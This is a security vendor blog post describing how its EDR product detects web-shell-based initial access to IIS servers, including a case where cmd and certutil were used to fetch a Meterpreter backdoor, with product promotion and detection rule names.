Initial Access to IIS Web Servers Detected by AhnLab EDR

In the modern Internet society, one can easily obtain information on devices all over the world connected to the Internet using network and device search engines such as Shodan. Threat actors can use these search engines to engage in malicious behaviors such as collecting information on attack targets or performing port scanning attacks against any devices. The threat actor utilizes the information collected to find weaknesses in the target system and attempt initial access. Ultimately, they are able to attain their goals such as lateral movement and distribution of ransomware. As such, corporate security administrators must practice persistent management and monitoring for abnormal behaviors if there are externally exposed IT assets.

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on Korea’s only self-behavior-based engine. AhnLab EDR continuously collects information related to suspicious behaviors based on each type, allowing users to precisely perceive threats from a detection, analysis, and response perspective. Users then can conduct comprehensive analysis based on the data to identify causes, respond with appropriate measures, and establish processes to prevent threat recurrence.

This post will cover how AhnLab EDR can be used to detect and respond to initial access to Windows Internet Information Services (IIS) web servers by threat actors.

1. IIS Worker Process (w3wp.exe)

The w3wp.exe process is the worker process of the IIS web server. It is responsible for the actual features of the web server and launches the ASP.NET application. Generally, threat actors identify attack targets using network device search engines such as Shodan. When a web server with a vulnerable version is identified, they exploit a vulnerability appropriate for the version to install web shells or execute malicious commands.

In the ASEC Blog post “Case of Malware Distribution Linking to Illegal Gambling Website Targeting Korean Web Server” uploaded on May 8th, 2024, threat actors were shown to download the Meterpreter backdoor through normal Windows utilities (cmd and certutil). While no web shell detection logs could be found in the infected PC, it seems that the Meterpreter backdoor was executed via a web shell since cmd.exe was launched by the w3wp.exe process.

Figure 1. Logs showing the detection of cmd and certutil being executed by a web shell (1)
Figure 2. Logs showing the detection of cmd and certutil being executed by a web shell (2)

Conclusion

Threat actors are attempting to initially access various externally exposed attack surfaces such as MS-SQL, Redis, MeshAgent, and Windows IIS. Because these attack surfaces can be looked up on network scan infrastructures such as Shodan, corporate security administrators must practice attack surface management to identify assets that can be exposed to threat actors and regularly apply security patches.

AhnLab Endpoint Protection Platform (EPP) and AhnLab Endpoint Detection and Response (EDR) products prevent security incidents through automated patch management and allow administrators to practice secure integrated management and operation of corporate infrastructures by providing continuous monitoring of endpoints and server terminals as well as visibility of threats to endpoint environments.

Behavior Detection
– InitialAccess/DETECT.Event.M11451
– Execution/DETECT.Behavior.M10699

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Initial Access to IIS Web Servers Detected by AhnLab EDR appeared first on ASEC BLOG.